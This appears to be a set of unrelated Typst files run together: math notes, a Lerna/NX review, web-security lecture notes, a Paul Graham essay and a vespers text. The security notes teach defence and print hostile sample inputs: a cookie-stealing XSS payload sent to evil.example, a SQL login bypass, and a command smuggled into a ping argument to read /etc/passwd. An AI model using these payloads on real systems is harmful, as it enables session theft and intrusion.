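                m[r] = [x - m[r][col] * y for x, y in zip(m[r], m[col])]
    return [row[n:] for row in m]

# The worked example from the notes: A = [[1, 2], [3, 5]].
inv_a = inverse([[1, 2], [3, 5]])
print([[int(x) for x in row] for row in inv_a])   # [[-5, 2], [3, -1]]
```

Running it on the second example, `[[1, 2], [3, 6]]`, raises `ValueError`, matching the conclusion that this matrix is not invertible.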
==== Examples
+ $ A = mat(1,2;3,5) \ mat(A space, space I_2;augment:#1) = mat(1,2,1,0;3,5,0,1;augment:#2) -->_(R_2<-R_2-3 R_1) mat(1,2,1,0;0,-1,-3,1;augment:#2) arrow.squiggly mat(1,0,-5,2;0,1,3,-1;augment:#2) => inv(A) = mat(-5,2;3,-1) $ so $A$ is invertible.
+ $ A = mat(1,2;3,6) \ mat(A space, space I_2;augment:#1) = mat(1,2,1,0;3,6,0,1;augment:#2) -->_(R_2<-R_2-3 R_1) mat(1,2,1,0;0,0,-3,1;augment:#2) $
We did not reach the identity matrix on the left-hand side, and we conclude that $A$ is not invertible.
=== (Definition) Elementary matrix
A matrix is called *elementary* if it is obtained from the identity matrix by applying a single elementary row operation. For example:
$ "elementary matrices" cases(mat(1,0,0;0,1,0;0,0,1) -->^(R_1 <-> R_3) mat(0,0,1;0,1,0;1,0,0) \ -->^(R_3 <- 7R_3) mat(1,0,0;0,1,0;0,0,7) \ -->^(R_2 <- R_2 - 3R_1) mat(1,0,0;-3,1,0;0,0,1)) $
|
|
https://github.com/binhtran432k/ungrammar-docs | https://raw.githubusercontent.com/binhtran432k/ungrammar-docs/main/contents/literature-review/lerna.typ | typst | == Lerna and NX <sec-lerna>
Lerna and NX are powerful tools designed to manage complex JavaScript monorepo
projects efficiently. This section will explore their key features, benefits,
and challenges, as well as their integration with each other to create a robust
development environment.
Lerna and NX offer a powerful solution for managing JavaScript monorepo
projects. By combining their strengths, developers can benefit from improved
organization, faster development, and simplified dependency management. While
there may be a learning curve associated with using these tools, the long-term
benefits outweigh the challenges @bib-lerna.
=== Lerna
- *Monorepo Management*: Lerna is specifically designed for managing JavaScript
projects with multiple packages within a single repository.
- *Versioning and Publishing*: Lerna simplifies versioning and publishing of
individual packages within the monorepo.
- *Dependency Management*: Handles dependencies between packages within the
monorepo, ensuring consistent versions across the project.
- *Workspaces*: Lerna supports workspaces, allowing developers to work on
multiple packages simultaneously within a single project.
=== NX
- *Build System*: NX is a versatile build system that can be used to manage and
build projects of any size and complexity.
- *Task Runner*: NX provides a powerful task runner for automating common
development tasks like testing, linting, and building.
- *Caching*: NX leverages caching to improve build performance by avoiding
unnecessary recompilation.
- *Distributed Build*: NX supports distributed builds, allowing for parallel
execution of tasks across multiple machines.
=== Lerna and NX Integration
- *Complementary Tools*: Lerna and NX complement each other, providing a
comprehensive solution for managing monorepo projects.
- *Shared Configuration*: Lerna and NX can share configuration settings,
streamlining the development process.
- *Workflow Integration*: Lerna and NX can be integrated into existing
  development workflows, providing seamless support for common tasks.
=== Benefits of Using Lerna and NX
- *Improved Project Organization*: Lerna and NX help organize large projects
into manageable packages, improving code maintainability and scalability.
- *Faster Development*: By leveraging caching and parallel execution, Lerna and
NX can significantly speed up build times.
- *Simplified Dependency Management*: Lerna's dependency management features
ensure consistent versions across packages, reducing the risk of conflicts.
- *Enhanced Collaboration*: Lerna and NX facilitate collaboration among team
members by providing a clear structure for managing multiple packages.
|
|
https://github.com/HEIGVD-Experience/docs | https://raw.githubusercontent.com/HEIGVD-Experience/docs/main/S4/ISI/docs/2-Intrusions/intrusion-web.typ | typst | #import "/_settings/typst/template-note.typ": conf
#show: doc => conf(
title: [
    Web intrusions
],
lesson: "ISI",
chapter: "2 - Intrusions",
definition: "Ce document traite de la cryptographie, une discipline essentielle pour sécuriser les communications en ligne. Il couvre les concepts fondamentaux des appels et réponses HTTP, la gestion des cookies, les outils de sécurité web (OWASP), et les techniques d'attaques web telles que le détournement de session, le cross-site scripting (XSS), et l'injection de commandes.",
col: 1,
doc,
)
= Web technology refresher
== HTTP calls
=== HTTP request
An HTTP call is a request sent by a client to a server. It consists of a request line, headers, and an optional body. The request line contains the HTTP method, the URI, and the protocol version; the body carries the data sent by the client.
==== Example HTTP request
```
GET / HTTP/1.1
Host: www.lemonde.fr
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) …
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: _ga=GA1.2.374864853.1475228586; xtvrn=$43260$; _cb_ls=1...
If-Modified-Since: Fri, 30 Sep 2016 16:10:47 GMT
```
=== HTTP response
An HTTP response is sent by a server back to a client. It consists of a status line, headers, and an optional body. The status line contains the protocol version, the status code, and the status message; the body carries the data returned by the server.
==== Example HTTP response
```
HTTP/1.1 200 OK
Date: Fri, 30 Sep 2016 16:10:47 GMT
Server: Apache
Last-Modified: Fri, 30 Sep 2016 16:10:47 GMT
ETag: "1d3-53e3a1f1f7d00"
Accept-Ranges: bytes
Content-Length: 467
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
```
=== HTTP headers
HTTP headers are additional pieces of information sent along with an HTTP request or response.
==== Example HTTP headers
===== General
```
Cache-Control: max-age=3600, public
Date: Tue, 15 Nov 2005 08:12:31 GMT
```
===== Request
```
Accept: text/plain;q=0.5, text/html
Accept-Charset: iso-8859-5, unicode-1-1;q=0.8
From: <EMAIL>
Referer: http://www.iict.ch/index.html
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)
Cookie: PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120; foo=bar
Authorization: Basic bXl1c2VyOm15cGFzcw==
```
===== Response
```
Location: http://www.heig-vd.ch
Server: Microsoft-IIS/6.0
Set-Cookie: session-id=120-7333518-8165026; path=/; domain=.amazon.com; expires=Sat Feb 27…
```
===== Content
```
Content-Encoding: gzip
Content-Length: 3495 (in bytes)
Content-Type: text/html; charset=ISO-8859-4
Last-Modified: Tue, 15 Nov 2005 12:45:26 GMT
```
=== Stateless HTTP
HTTP is a stateless protocol, meaning the server does not keep session state between requests: each request is handled independently of the others.
=== Cookies
Cookies are files stored on the client that contain information about the user. They are sent along with every HTTP request and allow the server to maintain session state across requests.
==== Cookie example
- Set-Cookie (in a response): stores a cookie on the client.
- Cookie (in a request): the value of the cookie previously stored.
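As a small illustration of this round trip, Python's standard `http.cookies` module can build a `Set-Cookie` response header and replay the matching `Cookie` request header (the session identifier is the one from the header example above):

```python
from http.cookies import SimpleCookie

# Server side: build a Set-Cookie header for the response.
jar = SimpleCookie()
jar["PHPSESSID"] = "r2t5uvjq435r4q7ib3vtdjq120"
jar["PHPSESSID"]["path"] = "/"
jar["PHPSESSID"]["httponly"] = True  # not readable from JavaScript

set_cookie_header = jar.output(header="Set-Cookie:")
print(set_cookie_header)

# Client side: parse the header and replay the cookie on the next request.
client = SimpleCookie()
client.load(set_cookie_header.replace("Set-Cookie:", "", 1))
cookie_header = "; ".join(f"{k}={m.value}" for k, m in client.items())
print("Cookie:", cookie_header)
```

The `HttpOnly` attribute shown here matters for the XSS attacks discussed later: it prevents scripts from reading the cookie via `document.cookie`.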
= References and tools
== OWASP
- Open Web Application Security Project (OWASP)
- International, open-source organization
- Participation is free and open to everyone
- Mission: promote application security
== Tools
- Browser plugins (Tamper Data, Firebug, etc.)
- External tools that intercept and analyze communications
  - Example: interception proxies
- Proxy software with many features
  - Example: Burp Suite
== Automated tools
- Web scanner/fuzzer/spider
- SAST = Static Analysis Security Tools
- DAST = Dynamic Analysis Security Tools
=== SAST
#image("/_src/img/docs/image copy 50.png")
#colbreak()
=== DAST
#image("/_src/img/docs/image copy 51.png")
== Interception proxies
- Rules / interception
- History or spider
- Match-and-replace
- Fuzzer
- Vulnerability scanner
- Manual requests
- Cookie/session/token analysis
#image("/_src/img/docs/image copy 49.png")
= Web attacks
- Data manipulation (URLs, cookies, etc.)
- Bypassing client-side protections
- "Session hijacking"
- "Cross-site scripting" (XSS)
- "Cross-site request forgery" (CSRF)
- Command injection (SQL or other)
== Goals of an attack
- Bypass a security mechanism (authentication or other)
- Extract data (confidentiality)
- Add or modify data (integrity)
- Determine the database schema
== Injection points
=== First order
- The application directly mishandles a piece of malicious input
- Examples:
  - User input / forms
  - Cookies
  - URLs
=== Second order
- The application mishandles a piece of data that was stored earlier
- Examples:
  - Database content
  - Uploaded files
  - Server-side variables
== Client-side protection
Any client-side protection can be bypassed. This is why protections must also be implemented server-side.
- Cookie contents
- HTTP headers (Referer, User-Agent, etc.)
- Form fields (even if hidden, restricted to the choices in a list, or validated in JavaScript)
- Any check done in JavaScript (i.e. on the client side)
A web application must always repeat every validation on the server side.
== Détournement de session
- Un attaquant récupère un identifiant de session valide pour contourner le mécanisme d'authentification.
- La technique varie en fonction du protocole (TCP, HTTP)
- Courant pour HTTP: vol de cookie, vol d'URL, falsification d'URL, etc.
#image("/_src/img/docs/image copy 52.png")
== Cross-site scripting (XSS)
=== Reflected XSS (non-persistent)
- The client controls a value that is used as-is in the response
- Example: custom search engines.
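To make the reflected case concrete, here is a minimal, hypothetical sketch in Python (the function names and the attacker URL are illustrative, not from any real framework) of a search page that reflects the query parameter into the response, and the escaped variant that neutralizes the payload:

```python
import html

# Classic cookie-stealing payload submitted as the "search" value.
PAYLOAD = "<script>document.location='http://evil.example/?c='+document.cookie</script>"

def search_page_vulnerable(query: str) -> str:
    # The user-controlled value is inserted verbatim into the HTML response.
    return "<h1>Results for: " + query + "</h1>"

def search_page_escaped(query: str) -> str:
    # html.escape converts <, >, & and quotes into inert entities.
    return "<h1>Results for: " + html.escape(query) + "</h1>"

# The vulnerable page returns the <script> tag as-is, so it would execute
# in the victim's browser; the escaped page renders it as plain text.
assert "<script>" in search_page_vulnerable(PAYLOAD)
assert "<script>" not in search_page_escaped(PAYLOAD)
```

Output encoding on the server side is the standard defense, consistent with the earlier point that client-side checks can always be bypassed.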
=== Stored XSS (persistent)
- The client controls a value stored on the server side.
- The value is later used in several other responses.
- Examples: forums, guest books, ...
=== DOM-based XSS
- Modification of the "Document Object Model" (DOM)
- The payload is not in the response but in the URL, and exploits a flaw in the client-side code.
=== Cookie theft (XSS via email)
#image("/_src/img/docs/image copy 53.png")
#colbreak()
=== Cookie theft (XSS on a forum)
#image("/_src/img/docs/image copy 54.png")
=== DOM-based XSS
#image("/_src/img/docs/image copy 55.png")
== CSRF (Cross-site request forgery)
- Goal = force the victim to execute a malicious action on a web application
- The victim opens a malicious URL
- The attack triggers a request to the targeted site
#image("/_src/img/docs/image copy 56.png")
== Command injection
=== Injection into SQL commands
- User-supplied data is used to build an SQL command for the database.
- Form, cookie, URL parameter, etc.
- Without protection, it is possible to change the meaning of the SQL command!
- And therefore to manipulate the database!
- Theft of the database (all or part of it)
- Destruction of the database (all or part of it)
- Modification/alteration of the data
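A minimal sketch of the classic login bypass, using Python and an in-memory SQLite table purely for illustration (the table and credentials are made up):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'secret')")

def login_vulnerable(name: str, password: str) -> bool:
    # The SQL command is built by string concatenation, so the input
    # can change the meaning of the command itself.
    query = ("SELECT * FROM users WHERE name = '" + name +
             "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None

def login_parameterized(name: str, password: str) -> bool:
    # Placeholders keep the input as pure data.
    query = "SELECT * FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (name, password)).fetchone() is not None

# The injected quote closes the string literal, and '1'='1' is always true.
assert login_vulnerable("alice", "' OR '1'='1") is True
assert login_parameterized("alice", "' OR '1'='1") is False
```

Parameterized (prepared) statements are the standard defense: the input can no longer terminate the string literal and alter the command.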
=== Injection into a system command
- Same idea, but the application builds a system (shell) command
- e.g. PHP include (https://brightsec.com/blog/code-injection-php/)
- It becomes possible to execute commands other than those intended by the developer
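The same pattern sketched in Python for a shell command (the ping command is just an illustrative example):

```python
import shlex

def build_ping_vulnerable(host: str) -> str:
    # User input concatenated into a shell command line: a ';' in the
    # input appends a second, attacker-chosen command.
    return "ping -c 1 " + host

def build_ping_safe(host: str) -> str:
    # shlex.quote wraps the value so shell metacharacters lose their meaning.
    return "ping -c 1 " + shlex.quote(host)

payload = "example.com; cat /etc/passwd"
assert build_ping_vulnerable(payload) == "ping -c 1 example.com; cat /etc/passwd"
assert build_ping_safe(payload) == "ping -c 1 'example.com; cat /etc/passwd'"
```

Better still is to avoid the shell entirely and pass an argument list to the process API (e.g. `subprocess.run` with a list, without `shell=True`).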
#image("/_src/img/docs/image copy 57.png") |
|
https://github.com/frectonz/the-pg-book | https://raw.githubusercontent.com/frectonz/the-pg-book/main/book/218.%20best.html.typ | typst | best.html
The Best Essay
March 2024

Despite its title this isn't meant to be the best essay. My goal
here is to figure out what the best essay would be like.

It would be well-written, but you can write well about any topic.
What made it special would be what it was about.

Obviously some topics would be better than others. It probably
wouldn't be about this year's lipstick colors. But it wouldn't be
vaporous talk about elevated themes either. A good essay has to be
surprising. It has to tell people something they don't already know.

The best essay would be on the most important topic you could tell
people something surprising about.

That may sound obvious, but it has some unexpected consequences.
One is that science enters the picture like an elephant stepping
into a rowboat. For example, Darwin first described the idea of
natural selection in an essay written in 1844.
Talk about an
important topic you could tell people something surprising about.
If that's the test of a great essay, this was surely the best one
written in 1844.
And indeed, the best possible essay at any given
time would usually be one describing the most important scientific
or technological discovery it was possible to make.
[1]

Another unexpected consequence: I imagined when I started writing
this that the best essay would be fairly timeless — that the best
essay you could write in 1844 would be much the same as the best
one you could write now. But in fact the opposite seems to be true.
It might be true that the best painting would be timeless in this
sense. But it wouldn't be impressive to write an essay introducing
natural selection now. The best essay now would be one describing
a great discovery we didn't yet know about.

If the question of how to write the best possible essay reduces to
the question of how to make great discoveries, then I started with
the wrong question. Perhaps what this exercise shows is that we
shouldn't waste our time writing essays but instead focus on making
discoveries in some specific domain. But I'm interested in essays
and what can be done with them, so I want to see if there's some
other question I could have asked.

There is, and on the face of it, it seems almost identical to the
one I started with. Instead of asking what would the best essay
be? I should have asked how do you write essays well? Though
these seem only phrasing apart, their answers diverge. The answer
to the first question, as we've seen, isn't really about essay
writing. The second question forces it to be.Writing essays, at its best, is a way of discovering ideas. How do
you do that well? How do you discover by writing?An essay should ordinarily start with what I'm going to call a
question, though I mean this in a very general sense: it doesn't
have to be a question grammatically, just something that acts like
one in the sense that it spurs some response.

How do you get this initial question? It probably won't work to
choose some important-sounding topic at random and go at it.
Professional traders won't even trade unless they have what they
call an edge — a convincing story about why in some class of
trades they'll win more than they lose. Similarly, you shouldn't
attack a topic unless you have a way in — some new insight about
it or way of approaching it.

You don't need to have a complete thesis; you just need some kind
of gap you can explore. In fact, merely having questions about
something other people take for granted can be edge enough.

If you come across a question that's sufficiently puzzling, it could
be worth exploring even if it doesn't seem very momentous. Many an
important discovery has been made by pulling on a thread that seemed
insignificant at first. How can they all be finches?
[2]

Once you've got a question, then what? You start thinking out loud
about it. Not literally out loud, but you commit to a specific
string of words in response, as you would if you were talking. This
initial response is usually mistaken or incomplete. Writing converts
your ideas from vague to bad. But that's a step forward, because
once you can see the brokenness, you can fix it.

Perhaps beginning writers are alarmed at the thought of starting
with something mistaken or incomplete, but you shouldn't be, because
this is why essay writing works. Forcing yourself to commit to some
specific string of words gives you a starting point, and if it's
wrong, you'll see that when you reread it. At least half of essay
writing is rereading what you've written and asking is this correct
and complete? You have to be very strict when rereading, not just
because you want to keep yourself honest, but because a gap between
your response and the truth is often a sign of new ideas to be
discovered.

The prize for being strict with what you've written is not just
refinement. When you take a roughly correct answer and try to make
it exactly right, sometimes you find that you can't, and that the
reason is that you were depending on a false assumption. And when
you discard it, the answer turns out to be completely different.
[3]

Ideally the response to a question is two things: the first step
in a process that converges on the truth, and a source of additional
questions (in my very general sense of the word). So the process
continues recursively, as response spurs response.
[4]

Usually there are several possible responses to a question, which
means you're traversing a tree. But essays are linear, not tree-shaped,
which means you have to choose one branch to follow at each point.
How do you choose? Usually you should follow whichever offers the
greatest combination of generality and novelty. I don't consciously
rank branches this way; I just follow whichever seems most exciting;
but generality and novelty are what make a branch exciting.
[5]

If you're willing to do a lot of rewriting, you don't have to guess
right. You can follow a branch and see how it turns out, and if it
isn't good enough, cut it and backtrack. I do this all the time.
In this essay I've already cut a 17-paragraph subtree, in addition
to countless shorter ones. Maybe I'll reattach it at the end, or
boil it down to a footnote, or spin it off as its own essay; we'll
see.
[6]

In general you want to be quick to cut. One of the most dangerous
temptations in writing (and in software and painting) is to keep
something that isn't right, just because it contains a few good bits
or cost you a lot of effort.

The most surprising new question being thrown off at this point is
does it really matter what the initial question is? If the space
of ideas is highly connected, it shouldn't, because you should be
able to get from any question to the most valuable ones in a few
hops. And we see evidence that it's highly connected in the way,
for example, that people who are obsessed with some topic can turn
any conversation toward it. But that only works if you know where
you want to go, and you don't in an essay. That's the whole point.
You don't want to be the obsessive conversationalist, or all your
essays will be about the same thing.
[7]

The other reason the initial question matters is that you usually
feel somewhat obliged to stick to it. I don't think about this when
I decide which branch to follow. I just follow novelty and generality.
Sticking to the question is enforced later, when I notice I've
wandered too far and have to backtrack. But I think this is
the optimal solution. You don't want the hunt for novelty and
generality to be constrained in the moment. Go with it and see what
you get.
[8]

Since the initial question does constrain you, in the best case it
sets an upper bound on the quality of essay you'll write. If you
do as well as you possibly can on the chain of thoughts that follow
from the initial question, the initial question itself is the only
place where there's room for variation.

It would be a mistake to let this make you too conservative though,
because you can't predict where a question will lead. Not if you're
doing things right, because doing things right means making
discoveries, and by definition you can't predict those. So the way
to respond to this situation is not to be cautious about which
initial question you choose, but to write a lot of essays. Essays
are for taking risks.

Almost any question can get you a good essay. Indeed, it took some
effort to think of a sufficiently unpromising topic in the third
paragraph, because any essayist's first impulse on hearing that the
best essay couldn't be about x would be to try to write it. But if
most questions yield good essays, only some yield great ones.

Can we predict which questions will yield great essays? Considering
how long I've been writing essays, it's alarming how novel that
question feels.

One thing I like in an initial question is outrageousness. I love
questions that seem naughty in some way — for example, by seeming
counterintuitive or overambitious or heterodox. Ideally all three.
This essay is an example. Writing about the best essay implies there
is such a thing, which pseudo-intellectuals will dismiss as reductive,
though it follows necessarily from the possibility of one essay
being better than another. And thinking about how to do something
so ambitious is close enough to doing it that it holds your attention.

I like to start an essay with a gleam in my eye. This could be just
a taste of mine, but there's one aspect of it that probably isn't:
to write a really good essay on some topic, you have to be interested
in it. A good writer can write well about anything, but to stretch
for the novel insights that are the raison d'etre of the essay, you
have to care.

If caring about it is one of the criteria for a good initial question,
then the optimal question varies from person to person. It also
means you're more likely to write great essays if you care about a
lot of different things. The more curious you are, the greater the
probable overlap between the set of things you're curious about and
the set of topics that yield great essays.

What other qualities would a great initial question have? It's
probably good if it has implications in a lot of different areas.
And I find it's a good sign if it's one that people think has already
been thoroughly explored. But the truth is that I've barely thought
about how to choose initial questions, because I rarely do it. I
rarely choose what to write about; I just start thinking about
something, and sometimes it turns into an essay.

Am I going to stop writing essays about whatever I happen to be
thinking about and instead start working my way through some
systematically generated list of topics? That doesn't sound like
much fun. And yet I want to write good essays, and if the initial
question matters, I should care about it.

Perhaps the answer is to go one step earlier: to write about whatever
pops into your head, but try to ensure that what pops into your
head is good. Indeed, now that I think about it, this has to be the
answer, because a mere list of topics wouldn't be any use if you
didn't have edge with any of them. To start writing an essay, you
need a topic plus some initial insight about it, and you can't
generate those systematically. If only.
[9]

You can probably cause yourself to have more of them, though. The
quality of the ideas that come out of your head depends on what goes
in, and you can improve that in two dimensions, breadth and depth.

You can't learn everything, so getting breadth implies learning
about topics that are very different from one another. When I tell
people about my book-buying trips to Hay and they ask what I buy
books about, I usually feel a bit sheepish answering, because the
topics seem like a laundry list of unrelated subjects. But perhaps
that's actually optimal in this business.

You can also get ideas by talking to people, by doing and building
things, and by going places and seeing things. I don't think it's
important to talk to new people so much as the sort of people who
make you have new ideas. I get more new ideas after talking for an
afternoon with <NAME> than from talking to 20 new smart
people. I know because that's what a block of office hours at Y
Combinator consists of.

While breadth comes from reading and talking and seeing, depth comes
from doing. The way to really learn about some domain is to have
to solve problems in it. Though this could take the form of writing,
I suspect that to be a good essayist you also have to do, or have
done, some other kind of work. That may not be true for most other
fields, but essay writing is different. You could spend half your
time working on something else and be net ahead, so long as it was
hard.

I'm not proposing that as a recipe so much as an encouragement to
those already doing it. If you've spent all your life so far working
on other things, you're already halfway there. Though of course to
be good at writing you have to like it, and if you like writing
you'd probably have spent at least some time doing it.

Everything I've said about initial questions applies also to the
questions you encounter in writing the essay. They're the same
thing; every subtree of an essay is usually a shorter essay, just
as every subtree of a Calder mobile is a smaller mobile. So any
technique that gets you good initial questions also gets you good
whole essays.

At some point the cycle of question and response reaches what feels
like a natural end. Which is a little suspicious; shouldn't every
answer suggest more questions? I think what happens is that you
start to feel sated. Once you've covered enough interesting ground,
you start to lose your appetite for new questions. Which is just
as well, because the reader is probably feeling sated too. And it's
not lazy to stop asking questions, because you could instead be
asking the initial question of a new essay.

That's the ultimate source of drag on the connectedness of ideas:
the discoveries you make along the way. If you discover enough
starting from question A, you'll never make it to question B. Though
if you keep writing essays you'll gradually fix this problem by
burning off such discoveries. So bizarrely enough, writing lots of
essays makes it as if the space of ideas were more highly connected.

When a subtree comes to an end, you can do one of two things. You
can either stop, or pull the Cubist trick of laying separate subtrees
end to end by returning to a question you skipped earlier. Usually
it requires some sleight of hand to make the essay flow continuously
at this point, but not this time. This time I actually need an
example of the phenomenon. For example, we discovered earlier that
the best possible essay wouldn't usually be timeless in the way the
best painting would. This seems surprising enough to be
worth investigating further.

There are two senses in which an essay can be timeless: to be about
a matter of permanent importance, and always to have the same effect
on readers. With art these two senses blend together. Art that
looked beautiful to the ancient Greeks still looks beautiful to us.
But with essays the two senses diverge, because essays
teach, and you can't teach people something they already know.
Natural selection is certainly a matter of permanent importance,
but an essay explaining it couldn't have the same effect on us that
it would have had on Darwin's contemporaries, precisely because his
ideas were so successful that everyone already knows about them.
[10]

I imagined when I started writing this that the best possible essay
would be timeless in the stricter, evergreen sense: that it would
contain some deep, timeless wisdom that would appeal equally to
Aristotle and Feynman. That doesn't seem to be true. But if the
best possible essay wouldn't usually be timeless in this stricter
sense, what would it take to write essays that were?

The answer to that turns out to be very strange: to be the evergreen
kind of timeless, an essay has to be ineffective, in the sense that
its discoveries aren't assimilated into our shared culture. Otherwise
there will be nothing new in it for the second generation of readers.
If you want to surprise readers not just now but in the future as
well, you have to write essays that won't stick — essays that,
no matter how good they are, won't become part of what people in
the future learn before they read them.
[11]

I can imagine several ways to do that. One would be to write about
things people never learn. For example, it's a long-established
pattern for ambitious people to chase after various types of prizes,
and only later, perhaps too late, to realize that some of them
weren't worth as much as they thought. If you write about that, you
can be confident of a conveyor belt of future readers to be surprised
by it.

Ditto if you write about the tendency of the inexperienced to overdo
things — of young engineers to produce overcomplicated solutions,
for example. There are some kinds of mistakes people never learn
to avoid except by making them. Any of those should be a timeless
topic.

Sometimes when we're slow to grasp things it's not just because
we're obtuse or in denial but because we've been deliberately lied
to. There are a lot of things adults lie
to kids about, and when
you reach adulthood, they don't take you aside and hand you a list
of them. They don't remember which lies they told you, and most
were implicit anyway. So contradicting such lies will be a source
of surprises for as long as adults keep telling them.

Sometimes it's systems that lie to you. For example, the educational
systems in most countries train you to win by
hacking the test. But
that's not how you win at the most important real-world tests, and
after decades of training, this is hard for new arrivals in the real
world to grasp. Helping them overcome such institutional lies will
work as long as the institutions remain broken.
[12]

Another recipe for timelessness is to write about things readers
already know, but in much more detail than can be transmitted
culturally. "Everyone knows," for example, that it can be rewarding
to have kids. But till you have them you don't know precisely what
forms that takes, and even then much of what you know you may never
have put into words.

I've written about all these kinds of topics. But I didn't do it
in a deliberate attempt to write essays that were timeless in the
stricter sense. And indeed, the fact that this depends on one's ideas
not sticking suggests that it's not worth making a deliberate attempt
to. You should write about topics of timeless importance, yes, but
if you do such a good job that your conclusions stick and future
generations find your essay obvious instead of novel, so much the
better. You've crossed into Darwin territory.

Writing about topics of timeless importance is an instance of
something even more general, though: breadth of applicability. And
there are more kinds of breadth than chronological — applying to
lots of different fields, for example. So breadth is the ultimate
aim.

I already aim for it. Breadth and novelty are the two things I'm
always chasing. But I'm glad I understand where timelessness fits.

I understand better where a lot of things fit now. This essay has
been a kind of tour of essay writing. I started out hoping to get
advice about topics; if you assume good writing, the only thing
left to differentiate the best essay is its topic. And I did get
advice about topics: discover natural selection. Yeah, that would
be nice. But when you step back and ask what's the best you can do
short of making some great discovery like that, the answer turns
out to be about procedure. Ultimately the quality of an essay is a
function of the ideas discovered in it, and the way you get them
is by casting a wide net for questions and then being very exacting
with the answers.

The most striking feature of this map of essay writing are the
alternating stripes of inspiration and effort required. The questions
depend on inspiration, but the answers can be got by sheer persistence.
You don't have to get an answer right the first time, but there's
no excuse for not getting it right eventually, because you can keep
rewriting till you do. And this is not just a theoretical possibility.
It's a pretty accurate description of the way I work. I'm rewriting
as we speak.

But although I wish I could say that writing great essays depends mostly
on effort, in the limit case it's inspiration that makes the
difference. In the limit case, the questions are the harder thing
to get. That pool has no bottom.

How to get more questions? That is the most important question of
all.

Notes

[1]
There might be some resistance to this conclusion on the
grounds that some of these discoveries could only be understood by
a small number of readers. But you get into all sorts of difficulties
if you want to disqualify essays on this account. How do you decide
where the cutoff should be? If a virus kills off everyone except a
handful of people sequestered at Los Alamos,
could an essay that had been disqualified now be eligible? Etc.

Darwin's 1844 essay was derived from an earlier version written in 1839.
Extracts from it were published in 1858.

[2]
When you find yourself very curious about an apparently minor
question, that's an exciting sign. Evolution has designed you to
pay attention to things that matter. So when you're very curious
about something random, that could mean you've unconsciously noticed
it's less random than it seems.

[3]
Corollary: If you're not intellectually honest, your writing
won't just be biased, but also boring, because you'll miss all the
ideas you'd have discovered if you pushed for the truth.

[4]
Sometimes this process begins before you start writing.
Sometimes you've already figured out the first few things you want
to say. Schoolchildren are often taught they should decide everything
they want to say, and write this down as an outline before they
start writing the essay itself. Maybe that's a good way to get them
started — or not, I don't know — but it's antithetical to the
spirit of essay writing. The more detailed your outline, the less
your ideas can benefit from the sort of discovery that essays are for.

[5]
The problem with this type of "greedy" algorithm is that you
can end up on a local maximum. If the most valuable question is
preceded by a boring one, you'll overlook it. But I can't imagine
a better strategy. There's no lookahead except by writing. So use
a greedy algorithm and a lot of time.

[6]
I ended up reattaching the first 5 of the 17 paragraphs, and
discarding the rest.

[7]
<NAME> confessed to making use of this phenomenon when
taking exams at Oxford. He had in his head a standard essay about
some general literary topic, and he would find a way to turn the
exam question toward it and then just reproduce it again.

Strictly speaking it's the graph of ideas that would be highly
connected, not the space, but that usage would confuse people who
don't know graph theory, whereas people who do know it will get
what I mean if I say "space".

[8]
Too far doesn't depend just on the distance from the original
topic. It's more like that distance divided by the value of whatever
I've discovered in the subtree.

[9]
Or can you? I should try writing about this. Even if the
chance of succeeding is small, the expected value is huge.

[10]
There was a vogue in the 20th century for saying that the
purpose of art was also to teach. Some artists tried to justify
their work by explaining that their goal was not to produce something
good, but to challenge our preconceptions about art. And to be fair,
art can teach somewhat. The ancient Greeks' naturalistic sculptures
represented a new idea, and must have been extra exciting to
contemporaries on that account. But they still look good to us.

[11]
<NAME> caused huge controversy in the early 20th
century with his ideas about "trial marriage." But they make boring
reading now, because they prevailed. "Trial marriage" is what we
call "dating."[12]
If you'd asked me 10 years ago, I'd have predicted that schools
would continue to teach hacking the test for centuries. But now it
seems plausible that students will soon be taught individually by
AIs, and that exams will be replaced by ongoing, invisible
micro-assessments.

Thanks to <NAME>, <NAME>,
<NAME>, <NAME>, <NAME>, and <NAME> for reading drafts of
this.
|
|
https://github.com/Kasci/LiturgicalBooks | https://raw.githubusercontent.com/Kasci/LiturgicalBooks/master/CSL_old/casoslov/velkaVecierenBezKnaza.typ | typst | #import "../../style.typ": *
#import "/CSL/texts.typ": *
#import "../styleCasoslov.typ": *
= Velikaja večerňa <X>
#show: rest => columns(2, rest)
#nacaloBezKnaza
#include "../zalmy/Z103.typ"
#si
#lettrine("Allilúia, allilúia, allilúia. Sláva tebí, Bóže.") #primText[(3x)]
#ektenia(12)
#note[The prescribed kathisma or "Blažen muž" follows:]
#lettrine("Blažén múž, alliluja, íže ne íde na sovít nečestívych, alliluja.")
#lettrine("Jáko vísť Hospóď púť právednych, i púť nečestívych pohíbnet, alliluja.")
#lettrine("Rabótajte Hóspodevi so stráchom i rádujtesja jemú so trépetom, alliluja.")
#lettrine("Blažéni vsi nacfíjuščiisja naň, vsi nadijuščiisja naň, alliluja.")
#lettrine("Voskresní, Hóspodi, spasí mja Bože moj, alliluja.*")
#lettrine("Hóspodi, čtósja umnóžiša stužájuščii mi, alliluja.*")
#lettrine("Hóspodne jesť spaséníje i na lúdech tvoích blahoslovénije tvoje, alliluja.")
#lettrine("Sláva: I nýňi: Alliluja.")
#ektenia(3)
#header[Hóspodi, vozzvách]
Hóspodi, vozvách k tebí uslýši mja, \* uslýši mja Hóspodi. \* Hóspodi, vozvách k tebí uslýši mja, \* voňmí hlásu molénija mojehó, \* vnehdá vozváti mi k tebí, uslýši mja, Hóspodi.
Da isprávitsja molítva mojá \* jáko kadílo préd tobóju: \* vozďijánije rukú mojéju, \* žértva večérňaja, uslýší mjá Hóspodi.
#include "../zalmy/Z_PaneJaVolam.typ"
#verse((
"Izvedí iz temnícy dúšu mojú, ispovídatisja ímeni tvojemú.",
"Mené ždút právednicy, dóndeže vozdási mňi.",
"Iz hlubiný vozvách k tebí Hóspodi, Hóspodi uslýši hlas moj.",
